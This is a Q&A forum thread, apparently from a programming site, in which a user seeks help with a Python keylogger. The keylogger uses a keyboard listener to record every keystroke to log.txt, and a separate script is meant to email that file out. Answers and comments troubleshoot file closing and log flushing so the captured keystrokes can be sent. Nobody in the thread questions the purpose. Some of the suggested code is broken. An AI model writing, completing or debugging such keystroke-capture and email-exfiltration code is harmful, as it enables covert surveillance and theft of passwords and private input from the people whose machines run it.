# How can I save it so the e-mail script can read/send it?

Tags: python, email, file-writing, keylogger

I want to send the log.txt to an e-mail. The e-mail part works, but this logger doesn't save the file. It saves it only on exit. So it keeps writing and writing. I inserted f.write after every key press but it didn't work.

If you could help I'd appreciate it.

The question is : How can I save it so the e-mail script can read/send it?

The code is:

```
log_dir = ""
logging.basicConfig(filename=(log_dir + "log.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s')
f = open('log.txt', 'w')
def on_press(key):
    logging.info(str(key))
with Listener(on_press=on_press) as listener:
    listener.join()
```

Answer (score 0, accepted):

Try closing the text file after something is written to the file

```
f.close()
```

Also I would suggest opening it with a `a+` to append the file

So something like this:

```
log_dir = ""
logging.basicConfig(filename=(log_dir + "log.txt"), level=logging.DEBUG, 
format='%(asctime)s: %(message)s')
#f = open('log.txt', 'w')

def on_press(key):
    f = open('log.txt', 'a+')
    logging.info(str(key))
    f.write("Put stuff here that you want written to a file")
    f.close()

with Listener(on_press=on_press) as listener:
    listener.join()
```

Comment: Well it still doesn't work. `def on_press(key):
  logging.info(str(key))
    f.close()


with Listener(on_press=on_press) as listener:
    listener.join()`
It writes to the file when it's running but it doesn't close it I think. Still sending nothing with the attachment.

Comment: @iroL If you close the file you will need to reopen it

Comment: `def on_press(key):
    logging.info(str(key))
    f.close()
    open('log.txt', 'a+')`
Like this right?

Comment: @iroL I edited my answer to show what I was thinking could work. Let me know if it does!

Comment: It won't work like that. `UnboundLocalError: local variable 'f' referenced before assignment`

Answer (score 1):

You need to flush the buffer. Try

```
logging.getLogger().handlers[0].flush()
```

After every write.

Comment: `def on_press(key):
    logging.info(str(key))
    logging.getLogger().handlers[0].flush()


with Listener(on_press=on_press) as listener:
    listener.join()` still not working somewhy  hmm.
I tried reopening it: `f = open('log.txt', 'a+')


def on_press(key):
    logging.info(str(key))
    logging.getLogger().handlers[0].flush()
    f.close()
    f


with Listener(on_press=on_press) as listener:
    listener.join()

` still not working